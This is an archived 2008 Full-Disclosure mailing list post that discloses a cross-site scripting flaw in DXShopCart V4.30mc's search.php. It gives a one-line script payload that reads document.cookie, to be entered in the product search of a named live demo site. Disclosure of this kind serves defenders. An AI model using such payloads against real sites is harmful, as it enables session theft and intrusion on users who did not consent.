lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <819cb9500808211252h14c99f1fv2b2c353bf8143d5a@mail.gmail.com> Date: Thu, 21 Aug 2008 15:52:43 -0400 From: "bug squash" <bugsquashr@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: DXShopCart V4.30mc search.php XSS ################################### DXShopCart V4.30mc search.php XSS ################################### Author: d00m3d! Chik3n hUnT3r 666 email: bugsquashr@...il.com Example: <script>alert(document.cookie)</script> in the product search on http://www.scripts4profit.net/ShopCartDX/index.php click submit - doh! ################################### _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/